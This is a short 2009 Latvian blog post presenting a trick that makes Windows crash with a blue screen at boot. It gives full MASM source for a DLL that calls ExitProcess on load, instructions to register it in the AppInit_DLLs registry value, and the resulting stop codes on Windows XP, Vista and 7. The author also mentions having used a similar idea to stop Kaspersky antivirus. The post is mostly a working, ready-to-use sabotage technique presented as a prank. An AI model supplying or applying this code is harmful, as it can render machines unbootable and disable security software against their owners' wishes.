Home > Drošība, Programmas > AppInit_DLLs = BSOD

AppInit_DLLs = BSOD

jūnijs 8th, 2009 Leave a comment Go to comments

Kādu dienu darbā, virtuvē pie sienas bija pielikta Kaspersky 2009 Anti-Virus reklāmas lapele (A4 formātā). Tā viņa tur nostāvēja kādu nedēļu. Nedēļa bija gana, lai man izbesītu un rastos burvīga doma, kā Kaspersky apturēt ātri un nesāpīgi.
Bet ne par šo ir stāsts, stāsts ir par to kā ar līdzīgu tehnoloģiju dabūt ārā zilo krāsu no perētājsistēmas.

Lūk, izejas kods:
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc


.code
DllEntry proc hInstance:HINSTANCE, reason:DWORD, reserved1:DWORD
invoke ExitProcess, 0
mov eax,TRUE
ret
DllEntry Endp
End DllEntry

Izejas kodu jākompilē ar MASM, un iegūtais DLL ir jāpiereģistrē [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows] AppInit_DLLs.

Pēc atsāknēšanas (restarta) uz Windows XP vajadzētu parādīties kam šādam:
c000021a {Fatal System Error} 0x00000000 (0x00000000 0x00000000)

Ar Windows Vista darbojas ļoti līdzīgi:
c000021a {Fatal System Error} 0xc0000001 (0x00000000 0x00000000)

Ar Windows 7 gan bija mazliet lielāka ņemšanās ar DLL piereģistrēšanu, bet palasot šo viss palika skaidrs:
0x000000f4 (0x00000003,0x8570b530,0x8570b69c,0x8285a4d0)

P.S.: Logus galināt no MAC OS X ir daudz vieglāk, jo vēlme nokaut reālo mašīnu pazūd pati no sevis.

Categories: Drošība, Programmas Tags: , , , , , ,
  1. No comments yet.
  1. No trackbacks yet.